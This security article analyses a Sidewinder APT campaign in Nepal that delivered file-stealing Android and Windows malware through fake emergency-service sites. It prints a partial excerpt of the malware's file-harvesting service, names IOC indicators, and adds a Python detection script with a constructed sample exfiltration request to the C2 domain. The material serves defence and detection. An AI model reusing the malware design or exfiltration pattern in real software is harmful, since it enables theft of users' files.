The eruption of widespread protests throughout Nepal in early September 2025 offered fertile ground for a sophisticated campaign orchestrated by the Sidewinder APT group.
As demonstrators mobilized against government policies and social media restrictions, threat actors exploited the turbulence to distribute malicious applications masquerading as legitimate emergency services.
Victims seeking live updates or assistance were enticed by realistic impersonations of Nepalese authorities, only to install malware that siphoned sensitive data from both mobile and Windows environments.
Sidewinder's operation relies on a dual-pronged delivery mechanism. On Android devices, victims encounter phishing websites spoofing the Nepalese Emergency Service login.
Spoofing the emergency service for credential phishing (Source – StrikeReady)
Once credentials are entered, the site redirects to an APK download, typically named Gen_Ashok_Sigdel_Live.apk, which users install under the guise of accessing live news.
Acting head of Nepal (Source – StrikeReady)
Meanwhile, Windows users download EmergencyApp.exe from a cloned Emergency Helpline portal (Figure 6). Both binaries request extensive permissions (file system access, microphone, camera) to facilitate data exfiltration.
StrikeReady Labs analysts noted the group's deliberate use of geopolitical events to maximize engagement, embedding the malicious payload within decoy content fetched from reputable outlets such as Al Jazeera.
APK decoy content (Source – StrikeReady)
These decoys lend credibility to the operation and help the malware bypass cursory inspection by non-technical users. Once installed, the mobile backdoor initializes a service that filters document and image files for exfiltration.
The Windows variant operates similarly, spawning background tasks that harvest files with extensions such as .docx, .pdf, and .xlsx.
Infection Mechanism and Permission Abuse
A closer examination of the Android sample reveals a multi-threaded FileUploadService class responsible for data theft.
Examination of data theft filters as well as infrastructure (Source – StrikeReady)
Upon execution, the service initializes an ExecutorService with a thread pool of fifteen workers. Each worker scans device storage for files matching predefined document and image extensions:
import android.app.Service;
import android.content.Intent;
import android.os.IBinder;
import java.util.Arrays;
import java.util.List;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;

public class FileUploadService extends Service {
    private static final int THREAD_COUNT = 15;
    // Document and image extensions the service hunts for on device storage
    private final List<String> docExts = Arrays.asList(".txt", ".pdf", ".docx", ".xlsx");
    private final List<String> imgExts = Arrays.asList(".jpg", ".png");
    private ExecutorService executorService;

    @Override
    public int onStartCommand(Intent intent, int flags, int startId) {
        // Fifteen worker threads scan and upload concurrently
        executorService = Executors.newFixedThreadPool(THREAD_COUNT);
        scanAndUpload();
        return START_STICKY; // Android restarts the service if it is killed
    }

    private void scanAndUpload() {
        for (String ext : docExts) {
            // Launch tasks to upload matching files
            executorService.submit(() -> uploadFiles(ext));
        }
        for (String ext : imgExts) {
            executorService.submit(() -> uploadFiles(ext));
        }
    }

    // Enumerates files with the given extension and POSTs them to the C2;
    // the body is not reproduced in the published excerpt
    private void uploadFiles(String ext) {
    }

    @Override
    public IBinder onBind(Intent intent) {
        return null; // started service, not a bound one
    }
}
Once files are identified, HTTP POST requests bundle them into multipart form data, using a recognizable boundary marker (----qwerty) that appears in the network capture.
pcap showing the 'qwerty' signature-able boundary (Source – StrikeReady)
All stolen files are sent to a C2 endpoint controlled by Sidewinder. Persistence is maintained via Android's foreground service notifications and Windows autostart registry entries.
By leveraging legitimate-seeming user interfaces and abusing high-level permissions, Sidewinder achieves a stealthy infection vector capable of breaching enterprise and personal environments alike.
Security teams should monitor for known IOC domains (e.g., playservicess.com), suspicious APK installations, and anomalous outbound traffic containing multipart payloads.
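The monitoring advice above can be turned into a concrete network check. The following Python script is an added example, not StrikeReady's tooling or anything from the malware itself: it parses raw outbound HTTP requests and raises alerts on the two indicators the article names (the ----qwerty multipart boundary and the playservicess.com domain) plus a weaker behavioural signal, a multipart POST carrying attachments with the document and image extensions the FileUploadService targets. The sample requests are constructed for the demonstration; the function names and the severity labels are my own.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Indicators quoted in the article: the multipart boundary seen in the pcap and
# the C2 domain listed as an IOC. Everything else in this script is constructed.
KNOWN_BOUNDARY = "----qwerty"
IOC_DOMAINS = {"playservicess.com"}
# Extensions the FileUploadService harvests, per the article.
TARGETED_EXTS = (".txt", ".pdf", ".docx", ".xlsx", ".jpg", ".png")

FILENAME_RE = re.compile(r'filename="([^"]*)"')
BOUNDARY_RE = re.compile(r'boundary=("?)([^";]+)\1', re.IGNORECASE)


@dataclass
class Alert:
    severity: str            # "high" for a direct IOC hit, "low" for a behavioural hint
    reason: str
    host: str
    filename: Optional[str] = None


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str], str]:
    """Split a raw HTTP/1.1 request into (method, host, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method = lines[0].split(" ", 1)[0]
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, headers.get("host", "").lower(), headers, body


def inspect_request(raw: str) -> List[Alert]:
    """Return alerts for one outbound request; an empty list means nothing matched."""
    method, host, headers, body = parse_request(raw)
    alerts: List[Alert] = []
    if host in IOC_DOMAINS:
        alerts.append(Alert("high", "known C2 domain", host))
    if method != "POST":
        return alerts
    match = BOUNDARY_RE.search(headers.get("content-type", ""))
    if match is None:
        return alerts                     # not a multipart upload
    if match.group(2) == KNOWN_BOUNDARY:
        alerts.append(Alert("high", "Sidewinder multipart boundary", host))
    # A multipart POST carrying document/image attachments is only a weak signal
    # on its own; it is meant to be combined with host reputation in a real pipeline.
    for name in FILENAME_RE.findall(body):
        if name.lower().endswith(TARGETED_EXTS):
            alerts.append(Alert("low", "document/image attachment in multipart POST", host, name))
    return alerts


# Constructed sample traffic (not taken from the StrikeReady capture).
EXFIL_REQUEST = "\r\n".join([
    "POST /upload HTTP/1.1",
    "Host: playservicess.com",
    "Content-Type: multipart/form-data; boundary=----qwerty",
    "",
    "------qwerty",
    'Content-Disposition: form-data; name="file"; filename="report.docx"',
    "Content-Type: application/octet-stream",
    "",
    "<constructed placeholder for file bytes>",
    "------qwerty--",
    "",
])

BENIGN_REQUEST = "\r\n".join([
    "POST /api/v1/events HTTP/1.1",
    "Host: telemetry.example.org",
    "Content-Type: application/json",
    "",
    '{"event": "app_open"}',
])

if __name__ == "__main__":
    for label, req in (("exfil", EXFIL_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, [(a.severity, a.reason, a.filename) for a in inspect_request(req)])
```

Feed it decrypted proxy or sensor output one request at a time; the high-severity alerts are the ones worth paging on, while the low-severity attachment alerts are a hunting lead to join against host reputation and APK installation events.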